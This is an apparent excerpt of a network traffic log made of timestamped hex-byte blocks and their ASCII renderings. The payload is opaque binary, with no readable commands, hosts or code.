b9 5f 71 32 f7 32 99 5b 7a 19 dd f9 6b 7b a3 dd f2 83 02 4e f2 b3 23 5c
                                                                              Data Ascii: y"#n,roCm1li.lPSFap99^lrsXipi-h]K8q"\nnqfbcycq8gZuuTa=s>s*j@`2p@xs,bPoZ_jVt|}`")^i:02vz_q22[zk{N#\
                                                                              2023-10-26 07:45:59 UTC3131INData Raw: 8f 29 21 0b 34 08 8a 19 1e 3c 46 89 94 1d 04 5c 94 24 4b 4f a6 81 f3 a8 36 fe 65 ba ed 02 1c d8 9f df 80 71 14 93 1e 38 ed 87 25 5b d0 7b 86 58 15 c3 ae 57 b8 32 d3 29 bb 2b 6b 71 dc 2e d5 bf f4 54 f1 c4 4d 54 8a ea 54 6d ab b7 03 e4 ae c1 49 48 2b 33 f2 84 aa 0d 42 c3 be b7 e1 90 3a 78 b1 3d f9 70 28 81 2e b9 40 a2 a9 60 2d 53 2f d4 6d a6 88 20 10 a3 aa d8 dd c1 1c 6e 2a 75 5b 7a 14 09 31 b9 56 79 14 73 f4 02 72 24 4b 22 dc 0f 4c 62 0b a1 73 62 5b cc c6 80 68 78 f2 36 ee f7 9b ad 2a 6b c4 21 d8 28 37 c4 96 58 12 7a dc 70 1e 43 f5 df 21 10 24 2f b2 01 74 b7 cb 44 f7 c1 a9 9e ed 37 03 f3 8a 68 2c 3a 5f b8 a4 ff 26 32 61 30 0b 54 eb 01 cb c8 1e 12 28 32 36 f3 2a 18 80 79 14 c4 06 e2 ea c6 02 1b 04 b9 5b d6 ca 7e 31 29 32 6c 9b 94 46 f8 3b a3 ef 6c cb c1 13
                                                                              Data Ascii: )!4<F\$KO6eq8%[{XW2)+kq.TMTTmIH+3B:x=p(.@`-S/m n*u[z1Vysr$K"Lbsb[hx6*k!(7XzpC!$/tD7h,:_&2a0T(26*y[~1)2lF;l
                                                                              2023-10-26 07:45:59 UTC3147INData Raw: d9 9c 4e 98 c7 91 9e 37 ac d8 69 d8 bc 8f 78 9c 57 8c 3c 29 8c 82 4a 3b ac c7 8a 57 dd 37 28 8a 03 69 0a 0d b5 93 42 14 91 42 4a 23 ac e1 08 34 a1 a2 38 a4 73 3f eb 5d c2 8f 39 09 07 43 f0 77 c5 cb bc 95 95 3a f9 1b f3 79 47 d0 74 b4 53 2c 09 65 2a 5a 9f 8a 41 b3 bf 85 ea 62 cc 44 eb 12 fd 4d 93 ab 0a c6 f9 86 49 8c bf 3a 12 ba ff 9c 60 22 45 95 04 bf 05 64 46 8a ba 97 f4 c5 f7 99 02 b4 00 94 16 6d a5 58 0e 3b eb 05 0c 43 e4 27 09 33 d5 b3 54 b4 c5 81 f8 b7 fb e7 a3 e2 6d 37 9e 21 cb 7b 19 34 eb e8 50 74 bf 54 c6 8d 92 85 57 fc 11 05 ff 70 a3 e5 d3 7c 78 60 4b 4e ad 5e 05 a3 8f 7a d7 71 8b 5e 42 c0 aa 4f ea 89 fb 37 34 ac 9f b8 34 5b d6 fc 2e 3c d9 18 5c 7c ea 55 c2 83 43 2b 09 ae f4 21 03 fa 5d 98 69 9f 73 0f 66 69 0a a9 00 97 a9 9a 55 f2 14 32 ed 01 0b
                                                                              Data Ascii: N7ixW<)J;W7(iBBJ#48s?]9Cw:yGtS,e*ZAbDMI:`"EdFmX;C'3Tm7!{4PtTWp|x`KN^zq^BO744[.<\|UC+!]isfiU2
                                                                              2023-10-26 07:45:59 UTC3163INData Raw: 0c 44 f6 4e f4 8e 8a fe 58 ce 49 51 aa 61 73 ad cc b7 40 64 e1 33 eb ea d2 40 08 86 19 e4 8d 84 c1 c9 53 9d 24 02 d9 6e 4e e8 42 d8 f3 8b 11 ff 8d 0b 70 28 b4 e0 e5 29 4c 6b 67 06 64 f9 5e 98 4e f4 d2 7f 56 db c1 38 ad 5d da 67 d2 76 16 a3 21 67 53 63 6b 22 b4 e7 47 7c e7 8d 16 b7 2e 69 62 fa 7e fa a7 bb c2 7c ba f6 c7 ac 40 d3 8a 9d 02 82 3f d8 5d 70 8a 9b 48 76 62 78 34 8c 14 a8 99 68 c3 56 17 34 86 48 f4 f6 47 58 24 f1 6d 0f b8 36 47 78 cc 3e ff 50 05 3c 0a af 24 cb 1d 30 9b 42 f4 e6 b8 88 ca 68 88 da 1f 15 de bf 56 60 93 a2 22 b5 89 90 25 29 14 f2 88 81 c4 83 82 77 07 ed 71 f8 11 49 02 fe 50 fa fc 77 5b f3 dc 2d f3 fa a9 54 f5 3f 81 41 1f 62 ae 20 ee bf 4e 48 84 40 78 25 ff 61 68 83 71 a4 72 8a d3 5b b0 d6 9b 82 e3 3e a9 7f 6a 33 e1 b3 40 d9 78 f9 ea
                                                                              Data Ascii: DNXIQas@d3@S$nNBp()Lkgd^NV8]gv!gSck"G|.ib~|@?]pHvbx4hV4HGX$m6Gx>P<$0BhV`"%)wqIPw[-T?Ab NH@x%ahqr[>j3@x
                                                                              2023-10-26 07:45:59 UTC3179INData Raw: 8e 86 d8 d7 1b 69 91 fb c0 79 b8 47 0e 3e 46 40 fb 64 c0 3a cd 16 eb 77 11 b1 7b 7d ef b1 08 a2 f2 b8 3a f8 82 87 e0 19 3c 62 42 53 e1 b5 7a 2d f4 41 61 22 15 9f 77 ed 23 62 e8 d3 72 c1 a4 b9 14 1f fd f7 e1 35 c4 40 56 54 aa 91 f1 01 ce f1 59 ee 8f e8 54 f2 18 f8 f5 61 e1 fb b2 c9 94 f8 14 69 c4 6a bc 34 22 78 ec cd a9 1d 09 45 c7 54 19 ef a9 97 03 81 f1 77 08 9a aa 77 8b d4 7f ab 76 e9 15 45 4e 76 b8 a5 f4 c6 13 a5 84 74 4a e4 7a cb 0f f9 f4 e1 e6 4e 00 7a fb 9a 8e 22 6f 4d 33 0f 56 11 1a fe ea 0e 8a 82 ea 5a 18 88 7d fa bc 71 77 47 0b 22 c2 79 f8 18 8e 98 db fc 2e d8 4a 1e 6b aa f2 04 08 a3 72 8f 40 4d 53 42 59 17 54 62 97 e4 f4 81 f9 31 0f 92 b9 6e ed ca 36 63 d3 8b 9a ff 12 9c 69 78 16 3d f8 17 0b c9 34 e7 e7 fc 72 15 32 35 58 66 c2 18 cb f7 dd 10 15
                                                                              Data Ascii: iyG>F@d:w{}:<bBSz-Aa"w#br5@VTYTaij4"xETwwvENvtJzNz"oM3VZ}qwG"y.Jkr@MSBYTb1n6cix=4r25Xf
                                                                              2023-10-26 07:45:59 UTC3195INData Raw: bf 17 00 a0 b5 7c 36 f8 59 64 f9 16 12 36 c6 bf a7 06 cb 4f 2f 42 0f f8 96 58 8a 08 14 8d 8e 06 fb 01 29 41 c0 4f 4b 7a 78 8f c1 5b 5a f3 71 98 1f e3 2a 1e 05 3a bb 85 0c 63 b3 dc f1 b4 fb 99 be 81 ac 5c f4 c3 fe a7 17 c2 f8 d1 03 b7 ba 5e 73 ec c2 f7 f6 ac 83 37 19 27 ed 18 45 22 8b 2e 01 92 52 2a be 68 ea 5e 44 7d c3 02 cc 81 42 85 dc 89 97 fa e7 b3 06 a9 12 e2 40 73 45 f9 63 cf a2 61 0b a1 17 b2 ca 31 0e 4e 8b 55 c4 b9 4a 8a bf 4e 7b b0 b4 79 e9 1a bb 8d c3 20 52 25 cf 97 06 62 56 5b db 71 9e d8 ee 8b cf 5f 4c 65 aa e0 0b 72 42 2c b4 b9 af 50 f3 ce d8 29 16 35 08 24 10 a2 c8 64 04 32 d4 f8 44 b4 52 85 0f b9 05 7a f4 db cf 2e 50 a2 c3 44 f5 5f b9 55 49 6d 69 40 54 22 89 5d 4c c3 15 99 b9 74 e9 17 0a ce 7a 69 57 b4 fa 97 0f f9 47 38 a4 e1 e4 26 6c c2 b4
                                                                              Data Ascii: |6Yd6O/BX)AOKzx[Zq*:c\^s7'E".R*h^D}B@sEca1NUJN{y R%bV[q_LerB,P)5$d2DRz.PD_UImi@T"]LtziWG8&l
                                                                              2023-10-26 07:45:59 UTC3211INData Raw: e0 b3 4b d3 34 60 09 1a 79 21 ea 27 14 67 46 24 a8 24 aa 77 34 51 c6 04 7d c5 f1 7d da 11 a2 2d f4 a4 84 f8 5c d3 af 0f 5d 33 eb f2 42 f6 c3 81 34 37 ae f7 74 7d 49 2c c1 04 a6 5d ca 44 c2 7b 43 c7 04 b8 d9 39 fb 4b f9 43 7d 80 c3 a1 aa 11 75 63 f9 70 b9 d0 5f 20 df 2b 8a 18 51 ea b1 77 4a 74 9f 8a 6b 73 db b7 14 48 ba db 0f 25 99 9f d4 6c d6 67 6f 0d 46 8e 74 66 85 01 df eb aa 30 8f c0 aa 10 c6 81 c4 68 f5 a7 69 4c 83 6a d4 5c 49 e3 a2 17 ef eb ba 69 51 00 6e 18 5c 22 d9 a9 b9 50 4e 38 48 4a 9f 36 d2 13 0b 11 54 02 77 81 07 d4 0a 8e d7 03 d9 9d 5b 22 ec 68 75 f7 ba 7b d8 25 5f e8 f4 0a dd 01 cd d4 d7 42 9b c2 a4 d3 54 87 8f cf e2 21 3c e2 b4 27 4b 7a 45 c4 31 e3 b8 d0 2e 98 f4 42 cb 05 8c cb ed 22 32 3f 07 b8 fb dc 7f f4 bb 01 93 75 19 ff 4a b8 4f c1 e3
                                                                              Data Ascii: K4`y!'gF$$w4Q}}-\]3B47t}I,]D{C9KC}ucp_ +QwJtksH%lgoFtf0hiLj\IiQn\"PN8HJ6Tw["hu{%_BT!<'KzE1.B"2?uJO
                                                                              2023-10-26 07:45:59 UTC3227INData Raw: a9 b8 b4 d7 13 8a ca fb 78 ef 00 18 42 a4 b0 ee 2b 82 16 d6 dd 31 85 4a b4 4f 3b 98 bb 6c 80 68 3b ba 5a 78 c0 fd 69 b4 da 71 4a 53 b6 aa f1 fd ca 50 0c 73 2a b7 ed a5 bf 0f 4b 58 a0 e5 f7 3a 1a b0 75 a5 9a ea ca 10 73 ae ff eb f4 c1 6a a9 99 02 40 ac b4 a0 ac ca d4 a8 22 06 00 17 ab 41 41 b5 87 e2 74 9d 0f e3 00 02 91 2a 54 87 49 98 79 81 68 58 59 5a c6 7f 16 e8 06 78 ed a3 96 51 92 81 62 47 a2 c1 6a b3 09 3a 16 59 35 a1 6e 18 b9 65 fb 39 f2 fe ed 2e 74 02 03 49 cd 8e eb cf c6 87 79 13 c4 75 91 62 42 69 86 00 6f cb ed c7 60 8d 75 df f3 89 41 3d d7 b1 ec 01 15 65 8a e0 62 31 93 f7 6d 99 b2 f7 d4 68 f4 d8 04 4c eb 1e 63 b1 d8 84 d7 5e d0 09 f2 3f e8 17 46 53 29 a0 fe 09 2f ef 59 c2 e6 f8 3b f7 45 b3 34 82 76 00 c9 53 e5 66 8d f3 2a b0 3c 95 66 38 90 2b 0e
                                                                              Data Ascii: xB+1JO;lh;ZxiqJSPs*KX:usj@"AAt*TIyhXYZxQbGj:Y5ne9.tIyubBio`uA=eb1mhLc^?FS)/Y;E4vSf*<f8+
                                                                              2023-10-26 07:45:59 UTC3243INData Raw: 80 aa 0a c4 fd ba 6a c8 66 5a f4 39 b9 b2 96 22 17 1e c2 37 95 22 eb 35 13 ad bf d0 d4 e1 e5 4c b4 4e ea 89 bf 31 af 95 92 22 a0 d6 d0 a1 94 57 94 b7 14 a5 5e 62 eb 05 f0 f6 18 1c ca 83 70 51 92 42 9a a8 74 dc 40 e9 18 f9 0d 0a c8 18 2b 98 eb dc 6e 40 07 02 16 bb 9e 01 d2 78 d4 81 a1 d9 46 a2 aa 53 c7 e0 a9 77 90 c2 ca 60 d4 cf 6a e4 7a 11 da 5c a9 ba be d7 e2 2a 85 6d 14 fd 6a f8 ab 76 c4 0c c5 55 ea 8f df 53 bc 95 a7 0f 49 18 a9 fb 05 58 b6 21 d9 b1 da ea 2a 1c b4 d2 ea 3f 1a b4 e3 17 dd 00 0e e0 48 f2 93 a4 6f 62 b5 6b d6 33 11 21 7b a3 ea 78 97 7a bb 11 c8 39 15 ae 53 f7 1a 38 f4 01 41 5b c4 dc 7e 01 97 ad 73 b1 94 90 6a d8 62 7c 23 01 d4 0e a4 70 74 3e 8b 78 d1 00 02 a9 19 c0 5a 69 15 72 c1 a3 f4 a1 c2 03 a8 65 82 38 65 24 2b 4f 64 62 8b 14 17 ad d2
                                                                              Data Ascii: jfZ9"7"5LN1"W^bpQBt@+n@xFSw`jz\*mjvUSIX!*?Hobk3!{xz9S8A[~sjb|#pt>xZire8e$+Odb
                                                                              2023-10-26 07:45:59 UTC3259INData Raw: ab 65 c5 9e f4 03 0b 94 cf fb d0 3b c3 89 5a 97 27 66 c1 a1 d8 d2 48 f8 d4 7c 97 39 10 1c b6 57 73 b8 0f ee 6a 53 14 c9 f4 43 0a f8 86 01 17 a7 c8 0a 3d 42 0a 64 0a 92 a6 4c bc 43 f4 e1 85 a8 09 96 97 5c de 3b 8c 50 9a 6b 68 9f a6 e1 ea 06 7b e9 76 f6 00 59 a3 39 b6 0f eb 9d 5b b9 27 97 02 71 c1 4e d4 bd 15 aa 74 2a 5a 8b 94 02 be ae b4 34 00 25 4c 70 97 cd 1a bc 6a 1d dd 87 0b 4a f6 6e 99 15 f0 22 4c 2c ed 45 0b f8 5d ae 79 78 03 65 a9 69 ba 45 e0 39 fb a0 d3 6a 43 a0 0a fa c0 bd 33 64 c5 62 4a 1d 09 4f fb f7 ef d1 c9 61 a8 a1 8b 2f 74 e2 50 23 c0 b9 af 45 8c 02 17 1b 14 e7 98 3e 3e 32 eb 53 b4 d8 01 7c 5b 73 53 22 7e 12 0b d9 4c 7c a1 1d 54 89 92 2d d4 01 3b 1a db d0 a9 f9 2f c7 43 b8 f4 3b 84 5f 77 26 cf 97 ac bb 19 48 94 39 e8 04 a5 53 ca 38 da da 3e
                                                                              Data Ascii: e;Z'fH|9WsjSC=BdLC\;Pkh{vY9['qNt*Z4%LpjJn"L,E]yxeiE9jC3dbJOa/tP#E>>2S|[sS"~L|T-;/C;_w&H9S8>
                                                                              2023-10-26 07:45:59 UTC3275INData Raw: 90 22 ab 39 dc 66 88 c4 d1 74 31 aa d1 e4 29 dc 11 33 92 09 84 6e c9 b1 4c 7a fb 42 75 e4 4a 59 9f e5 4a 21 45 36 2b a0 ed b9 fb a0 ce ed 30 f8 f3 cb fd 90 94 90 ca 5a 6e 65 03 10 fd 48 7a 51 f4 21 6e 85 cc 71 3d 64 c1 8e 62 a4 14 a2 71 d0 63 3b 07 65 5b 98 2a 8a 05 9f ea e5 5a cb fb 9a 7e da 0a 78 84 eb 09 69 0a ac 77 8a f3 57 14 a7 67 6c eb 62 d6 e1 aa 81 0d b6 ea 64 4d 77 a1 50 16 b7 24 7c 0f a2 0a 55 47 27 ee 78 b4 ad cb 79 d6 81 8a 6c de 7b 41 17 88 82 f4 dd ff 39 ca ab 93 61 b9 17 d4 72 13 51 6d 25 ab ee 64 7b 43 2e 06 70 4f 60 da 7d 6a 2b 11 44 d0 09 5d a2 bb 13 04 65 47 eb 13 33 8b f6 8d 22 0b a5 8b 7a e9 a7 7c ed d8 16 4f f3 33 c0 46 98 1b e7 e4 61 bd 5b f4 53 0a 1d 12 3b f7 37 ab 61 c2 f6 d2 7a 6c e5 6a 38 dd 52 47 14 54 5d 14 fd 68 78 3b 8a 4a
                                                                              Data Ascii: "9ft1)3nLzBuJYJ!E6+0ZneHzQ!nq=dbqc;e[*Z~xiwWglbdMwP$|UG'xyl{A9arQm%d{C.pO`}j+D]eG3"z|O3Fa[S;7azlj8RGT]hx;J
                                                                              2023-10-26 07:45:59 UTC3291INData Raw: 66 82 04 5c 02 0f fb 4e 03 42 13 16 f2 c1 44 b0 f8 b8 e8 b7 09 16 43 18 f2 c8 13 aa 86 9e 88 2a f4 86 97 a8 34 c2 46 25 fb b8 4a 3d cb c0 41 98 72 02 67 38 97 c2 6a 65 42 66 d6 60 82 ee be a1 b0 21 0a b5 86 df ca 63 74 62 10 21 9a 7a 9f 29 dc 8e 54 00 a3 41 f2 1b 81 6d a4 a8 54 6a eb 68 0d a0 aa 89 e5 6a 75 a7 bd d9 2a 59 c3 61 0c 4b 95 49 a2 57 94 ef be 25 46 dc 16 09 37 02 6b 24 2e 79 d1 87 8d 63 58 19 28 c5 c5 9a 45 ce 0a 5f 3c ca 4a 7f 57 8f 01 1e bf 62 ca fc 6a c0 b9 97 3f d1 0a 34 76 de 6a 7c ad 70 a4 a1 4b 22 e9 80 16 9b c9 94 f4 b5 38 2f cf 90 65 8f f3 41 ea 75 b2 90 71 98 d4 dc 9f 77 cb 3d 94 7d be 50 c5 11 4c 88 b2 69 50 6d de 94 a4 9e 32 98 03 7a ea 3e ce 40 90 79 cd 77 d4 8e 9f d3 b3 f8 94 9b e2 6f 8e b8 61 a1 fc 67 d7 23 3d ca 7a f8 8f 87 66
                                                                              Data Ascii: f\NBDC*4F%J=Arg8jeBf`!ctb!z)TAmTjhju*YaKIW%F7k$.ycX(E_<JWbj?4vj|pK"8/eAuqw=}PLiPm2z>@ywoag#=zf
                                                                              2023-10-26 07:45:59 UTC3307INData Raw: c1 d6 03 93 a4 fa 63 22 d4 61 88 8e 03 0a 6d 98 94 7a f0 32 8e 82 b9 ba 07 70 bb 35 95 04 bd 52 9a 39 70 78 f2 41 82 74 c7 95 ea f5 89 e6 3a 77 81 82 7a f4 01 aa 01 2b c1 3e 1b 2e ab 70 79 fe dc 8f 6a f0 d0 8b 80 8c 56 c7 0d 7f 94 1e 8b 70 73 80 0e 98 67 f1 4a 73 66 92 59 f5 a4 61 af a4 57 42 eb f1 85 dc 5d fe 4b 56 f0 1b c1 59 e9 f7 fc 4c f1 fb 04 9f 3d 9d d4 22 ec 14 b4 51 73 0b f3 83 38 d1 d4 88 92 3f 34 74 e1 16 9d b1 8a 8b 94 f1 c7 d1 82 62 b2 c9 ef fe 07 27 9a 83 6a d8 67 42 10 ef f3 e4 cb 66 bf eb 00 3d 79 e2 4d f4 c0 41 6b 69 c8 f7 0b f5 81 62 fd 98 82 c7 f6 67 be 52 b6 d0 74 6d ce da 16 42 8b a4 c8 61 96 53 b2 b2 59 94 5e ec a4 ff f0 41 e8 5d f2 f0 41 06 c5 29 0b 19 ef da 6a 70 55 d8 eb 53 49 24 20 38 b4 8f 45 ed f0 c1 67 d6 20 22 97 78 7b bc a4
                                                                              Data Ascii: c"amz2p5R9pxAt:wz+>.pyjVpsgJsfYaWB]KVYL="Qs8?4tb'jgBf=yMAkibgRtmBaSY^A]A)jpUSI$ 8Eg "x{
                                                                              2023-10-26 07:45:59 UTC3323INData Raw: 43 42 00 98 54 7f a3 4b 74 02 58 01 3b 9a 65 78 62 61 3f 3c 5a 91 01 97 13 42 47 1c 2c 82 37 a9 56 a2 ca d1 66 91 ba f8 44 82 af ff 48 02 06 08 e0 51 91 f8 f6 c0 fd 99 bb ac 43 08 b4 38 0d 32 d3 40 5f d8 2d f1 bf 17 d4 50 ec 7c a9 7d 87 02 cf 0c ea 57 9d d9 e5 0d db 01 9b 87 07 25 b5 fb 06 f2 3f 29 bf a1 7b 51 f4 eb 0c 58 f3 b3 f9 df 77 c2 c4 9a f4 70 eb f7 0b 2d 89 4d ed 61 71 af 4c 12 6c 06 58 e4 ed 0b 79 90 43 5a f0 27 39 d9 46 6d 0a f9 f3 fd 66 fc 5d 80 5d 38 a1 41 80 f1 94 46 70 04 ac 7d 4a ce 74 e2 3a 4d 54 e1 a1 17 87 20 91 4a 54 3c 76 b8 da 03 cb 7b c8 89 e8 62 f3 35 93 8c ac 3f cb d9 6b 2e a2 e1 b4 8e 40 12 d4 b8 c9 d7 d1 80 72 38 cb 68 ca 18 01 be c4 1b 13 0a 4b 7c 8b db 6a 06 96 a2 0a a0 c3 bc df 54 b4 bb 90 e0 d4 62 94 49 64 19 75 f4 61 8c 3b
                                                                              Data Ascii: CBTKtX;exba?<ZBG,7VfDHQC82@_-P|}W%?){QXwp-MaqLlXyCZ'9Fmf]]8AFp}Jt:MT JT<v{b5?k.@r8hK|jTbIdua;
                                                                              2023-10-26 07:45:59 UTC3339INData Raw: 14 3a eb 63 af 99 f7 3a 7d 7a 81 57 66 c5 48 f8 d3 a1 6c c4 16 bb e9 ea 08 6d 7e ee c5 bc 4a 5f a9 4e c1 df d4 90 0a 99 14 7b ec 38 6c b1 eb 84 93 d0 af 24 4b 17 90 58 ac e1 af 66 44 22 06 a2 7b 7d 0a 8b fb 83 7b f0 a4 81 b7 e3 e6 9b 7c 56 5e e0 ee a2 bd fb 80 08 34 7b 0b e9 0f ea c1 3f b4 b6 0e 97 58 5a 84 78 4d 48 6f fe 0a 3c 8b 53 10 41 e9 97 ec 7e 69 d3 71 64 d6 5e c1 da 0e a0 7a c2 25 7c d0 71 cb d6 9e 61 d8 b7 fc c1 84 f4 16 3b 8d a8 e0 76 af 57 34 ad ef 57 13 e2 35 1c 0c bd 8d ca ca 3c e9 d7 44 a5 94 ce 74 62 05 db 78 b4 07 aa f9 00 0d 43 84 b3 2a 7c 46 ae 59 0e 34 fd 9f 62 37 62 0a 78 ba e2 76 58 f4 0f b7 0e 74 63 7a f2 c0 81 7f f3 6d e2 81 07 d1 a5 c0 bc d1 5e 00 ce 1a 59 2a ec 94 ec 70 f7 74 c3 ce 58 94 ea da ed 04 b1 82 c5 05 fa 5c 33 50 22 80
                                                                              Data Ascii: :c:}zWfHlm~J_N{8l$KXfD"{}{|V^4{?XZxMHo<SA~iqd^z%|qa;vW4W5<DtbxC*|FY4b7bxvXtczm^Y*ptX\3P"
                                                                              2023-10-26 07:45:59 UTC3355INData Raw: 34 e3 bc 25 47 12 f0 47 7a 42 77 5a ab cc ee f5 b3 fb 6b 08 62 62 05 2c 34 54 c8 df f4 1e cc 2c f3 21 11 a5 5e 7c 92 38 74 88 3e 24 6d 53 5d ce 34 88 c8 8d f2 3f 2b d8 39 1c 77 64 6e 79 ea 1a 16 f9 6e 27 0d 41 b0 54 59 ed aa 23 f4 ac 77 5d c2 01 ff 44 ce 85 ed 11 71 55 78 f0 94 fc f6 f1 79 f8 5e 66 5d d9 1b 60 b4 f4 98 88 b9 c5 04 70 e1 2a 61 67 7b 37 7f 1e 3f 8b aa 2e 2a c2 f2 e0 64 e0 5b 78 ba b2 f5 0f fd f7 a4 26 bb 81 63 47 92 e2 0b 39 34 a2 3e 14 1a 01 ae f7 f3 44 95 f8 9e 16 77 f6 07 a2 e4 d0 c9 58 6f 39 54 54 4a e4 2b c6 aa fd f2 9b 8e a3 94 8f 35 3a b4 21 4b 91 7c ea dd 67 f3 b7 fb dc 9d f8 3b f4 75 e3 f1 fc ba d6 8a 77 63 66 c9 54 7e d0 cb 51 f4 e1 60 87 04 4b c8 8e 94 5b aa d1 64 e2 47 cd 7b ec 32 b8 93 da 3a 43 94 22 3a d7 ea 3d 13 2c 74 99 46
                                                                              Data Ascii: 4%GGzBwZkbb,4T,!^|8t>$mS]4?+9wdnyn'ATY#w]DqUxy^f]`p*ag{7?.*d[x&cG94>DwXo9TTJ+5:!K|g;uwcfT~Q`K[dG{2:C":=,tF
                                                                              2023-10-26 07:45:59 UTC3371INData Raw: 54 26 2f 21 bc a2 72 67 da 65 5a 07 b8 0e ab 7c 7d c9 43 17 b0 21 27 35 54 c2 62 54 3c 9d aa 77 4b e4 fd 14 3e d2 53 22 e5 a1 a7 e6 d1 36 87 9c 73 c2 11 42 c4 81 4a 54 d4 be ca f5 b5 0c 8c 9a 72 0d ea 57 69 15 9d f3 b4 18 0a f8 c3 85 97 d0 06 6f 56 28 74 82 8a a6 b4 ba 3b 71 66 7f e1 39 ed 81 d5 cf 7b d2 11 fa f4 43 c0 b5 f4 84 d3 15 66 72 88 3c bb b1 47 79 02 99 99 97 76 b4 ea ff e8 99 78 18 0c dc 05 5e a7 a1 d4 4f c2 c1 ee 15 17 9c d7 db df 8f 0a 78 47 89 b0 00 34 e4 d8 3a 26 8c f2 f7 0b 26 0d 79 b9 06 e2 35 24 91 d2 5b 94 b7 a9 3b c6 63 aa 25 43 37 52 78 21 4c c7 57 f5 e4 72 a0 34 7c 9b 37 8d e2 aa 38 0c 62 bf ff 05 ac 6b 24 3f 61 ca 43 b4 b6 25 2b 10 3a 28 78 d2 2a 79 5a c4 68 6f a9 b8 98 6f 72 46 4d c6 b7 fb 45 b2 fa 92 39 d1 e6 26 0d 4d 7e 87 bd f2
                                                                              Data Ascii: T&/!rgeZ|}C!'5TbT<wK>S"6sBJTrWioV(t;qf9{Cfr<Gyvx^OxG4:&&y5$[;c%C7Rx!LWr4|78bk$?aC%+:(x*yZhoorFME9&M~
                                                                              2023-10-26 07:45:59 UTC3387INData Raw: 90 82 40 5c 94 8f 30 26 41 62 a4 e7 54 aa 40 52 3e f2 f6 59 44 8e 7b f8 91 3e 90 42 c5 3e eb 57 93 87 82 65 a6 81 f1 a0 02 1f d3 37 30 82 aa 01 04 d2 0a 33 0a 11 f2 f7 fc 9b 4a 38 4b 7b e9 a7 06 d3 77 5a 66 c7 00 96 b3 c1 d0 40 4c ad aa f7 4a 83 89 71 95 86 7a 25 48 a2 ca 64 40 78 59 ed 44 22 e8 ed 02 42 87 f2 5d 1e 6f 18 1c a2 47 43 9b 0e 4b b8 61 a4 7e 79 45 67 07 0c 12 3b 56 d3 78 22 ce 77 bf af 02 10 7b 83 cc 0c fb ef fe 32 97 46 0b e5 a2 81 ee 01 71 d9 5e f5 b3 b5 6b 49 0a d0 4c f8 c0 61 db 63 57 5d 93 69 4c 76 ea d3 16 97 88 6a d4 f6 10 78 49 84 78 09 c4 b2 a3 2a f0 46 ff df 18 45 54 85 4e 1f 63 c5 49 09 8b 1b 75 df fb fe f2 d5 4e 5b 7f 82 10 a7 3c 62 00 99 e6 7f 9a f0 e1 b6 85 78 e7 8a 6c 79 ba 00 62 b9 32 ba 8a 7d 54 4a ad c1 14 e2 56 ec 11 d9 23
                                                                              Data Ascii: @\0&AbT@R>YD{>B>We703J8K{wZf@LJqz%Hd@xYD"B]oGCKa~yEg;Vx"w{2Fq^kILacW]iLvjxIx*FETNcIuN[<bxlyb2}TJV#
                                                                              2023-10-26 07:45:59 UTC3399INData Raw: 28 b3 6a 21 e5 6a 0f a1 f2 c3 ea d7 d6 e1 f0 1a 7f c2 ea 94 c3 62 fd 37 fc a2 bf 99 1d cc 7a 58 40 61 a0 76 e2 a5 f9 fd 95 e9 5b e4 b4 88 ca 47 34 79 b1 85 14 54 43 79 6d 10 03 38 ae a0 08 d4 d4 6a f2 fa 6f 37 8b f8 05 45 6d a9 17 a2 ac cb 54 52 b7 7c 0e 29 cc 6d 49 ec 0a 55 11 ba ca 77 18 9a d7 31 cd 35 01 22 85 85 4a 24 6b 3c d7 24 74 62 48 2b 0e ad ed 83 aa b7 46 41 b0 21 3a 48 8a 6d d7 c1 dc 81 3f 61 65 22 eb 22 75 6b 5d 14 6d d6 9b 71 b4 fd e9 79 bb c1 3d 1f ca 6c 6a 55 1d 56 6a 6c 03 bb 2a f8 88 5f b0 1b 0f 33 65 49 d4 63 ca ff 2f c8 9c d7 f3 42 c6 53 bc 6b 32 13 41 d9 1d 78 2d 77 62 e8 4e 63 a8 3e f3 bd 00 92 12 3b fa 8f c5 dc dc a0 c9 d6 6a 78 d5 76 b2 4f f1 95 8a 58 85 b4 0d f6 10 1a 0b f0 54 55 c4 77 03 94 12 20 80 91 a9 15 5d 52 aa 69 b4 b0 75
                                                                              Data Ascii: (j!jb7zX@av[G4yTCym8jo7EmTR|)mIUw15"J$k<$tbH+FA!:Hm?ae""uk]mqy=ljUVjl*_3eIc/BSk2Ax-wbNc>;jxvOXTUw ]Riu
                                                                              2023-10-26 07:45:59 UTC3415INData Raw: 63 45 85 d8 fb d9 64 c7 6c 62 af ed de 78 31 21 9d 61 4a 18 97 6d 67 4f 1d f0 3d 98 d4 89 a2 8a 09 51 f2 a1 00 42 7b 38 01 da 79 96 00 d1 7f 38 f9 fe 42 78 f2 06 74 31 33 e8 5a 19 be db 36 49 e3 61 02 76 d6 7a 46 6b 60 df 9f 80 4b a2 ca 37 c1 d0 5a 3d 87 2a ab d5 63 89 af 99 5c a2 61 58 e2 40 93 77 44 82 05 5f b3 72 22 18 e5 45 74 1f a7 8f 84 fb f3 d8 08 ac d8 2a b1 38 15 e2 6a 54 85 d4 d7 12 52 ef 7f aa 54 7e ce 8a 67 a9 7a 58 0b 62 7d 02 61 e3 6d fe 11 3d a1 df 40 42 48 18 97 6e 83 08 f9 b8 5b c7 10 42 d5 79 80 e5 8b 20 f4 f6 68 58 02 e1 3b 48 34 a5 aa 77 07 f5 da 6c 44 68 5e 05 13 22 88 c5 7c 8c 80 50 14 6b 08 2e b5 b7 06 2f 64 4d 0b 98 3b ff e2 b7 0e ed 04 f2 e1 b0 7e 38 07 4c 0f 7c b2 05 72 b1 cf 5f 68 ad 4c 94 19 74 e4 4d ec 54 b6 74 4a 7f 2d 7d 6e
                                                                              Data Ascii: cEdlbx1!aJmgO=QB{8y8Bxt13Z6IavzFk`K7Z=*c\aX@wD_r"Et*8jTRT~gzXb}am=@BHn[By hX;H4wlDh^"|Pk./dM;~8L|r_hLtMTtJ-}n
